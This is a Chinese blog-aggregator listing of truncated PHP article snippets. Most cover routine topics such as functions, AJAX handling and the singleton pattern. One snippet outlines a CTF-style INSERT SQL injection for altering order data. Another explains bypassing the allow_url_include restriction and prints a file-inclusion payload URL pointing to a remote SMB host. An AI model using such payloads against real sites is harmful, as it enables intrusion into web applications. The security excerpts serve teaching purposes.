一、自定义函数 function 函数名([形式参数1,形式参数2,....形式参数n]){ //各种PHP代码.... //...... return 表达式;//也可以不返回,如果不写那么默认返回null } 函数的调用: 函数的调用需要遵循定义函数的时候写的规则,一一对应,将具体的实际参数传给 ...
分类:
Web程序 时间:
2019-06-17 10:23:50
阅读次数:
145
题目链接 0X00题目给出的PHP代码 0x01 insert sql漏洞 将消息插入数据库 一般出现地方:电商生成订单接口存在INSERT型SQL注入漏洞,可修改订单金额数据,生成订单时会往数据库插入数据,但此处使用了动态查询语句的方式进行插入,通过注入数据可以达到篡改订单数据的目的 本题注入点X ...
分类:
数据库 时间:
2019-06-15 00:01:21
阅读次数:
137
环境: 打包工具: Webpack; 整合软件包: WAMP; 编辑器:VsCode; Webpack虚拟出的端口号是8080,本地Apache的端口号是80 问题重现: JS代码,使用FormData对象作为传输数据的格式: PHP代码,使用跨域接收他域传来的访问请求: 问题: XMLHttpRe ...
分类:
Web程序 时间:
2019-06-13 14:09:49
阅读次数:
215
php代码如下 如果用$_POST接受 其他方法 只需要很小的改动,把它变成字符串提交就好。 在服务器端 var_dump(json_decode(urldecode($_POST['ajax']))); 了。 如果是要模拟jQuery的Ajax请求,就再加个config 接下来在PHP里,就可以用 ...
分类:
移动开发 时间:
2019-06-11 19:01:11
阅读次数:
210
来源:http://www.mannulinux.org/2019/05/exploiting rfi in php bypass remote url inclusion restriction.html?m=1 前言 文章讲诉了如何绕过远程URL包含限制。在PHP开发环境php.ini配置文件里 ...
分类:
Web程序 时间:
2019-06-07 01:02:33
阅读次数:
146
分享几个当allow_url_include = Off时的文件包含漏洞的绕过方法。 假设服务端的php代码(aaa.php)如下图所示: 第1种:smb协议 Payload:http://127.0.0.1/aaa.php?path=\\43.5*.**.74\ica\abc1238.htm 这种 ...
分类:
Web程序 时间:
2019-05-31 19:47:39
阅读次数:
252
在编写PHP代码的时候,经常使用new关键字实例化一个对象,比如 <?php Class Database { } $db = new Database; 这是最常规的实例化操作方法,像数据库操作的方法类,如果多次进行new操作,将消耗更多的系统资源,那么有什么好的方法了? 什么是单例模式? 1) ...
分类:
Web程序 时间:
2019-05-31 13:52:31
阅读次数:
145
通过一番思考,决定利用业余时间学习和使用PHP。 PHP方面的框架有好几个,但是听取朋友的建议,先把原生PHP学好,后面使用框架简直就是顺水推舟。 为了能在自己的电脑上(mac OS系统)开始编写PHP代码并完成运行,需要有: 1、安装Web服务器 2、安装PHP 3、安装数据库,比如MySQL 4 ...
分类:
Web程序 时间:
2019-05-27 19:07:57
阅读次数:
163
原文:https://blog.csdn.net/a519395243/article/details/77942913 1、一群猴子排成一圈,按1,2,…,n依次编号。然后从第1只开始数,数到第m只,把它踢出圈,从它后面再开始数,再数到第m只,在把它踢出去…,如此不停的进行下去,直到最后只剩下一只 ...
分类:
编程语言 时间:
2019-05-26 13:08:08
阅读次数:
112
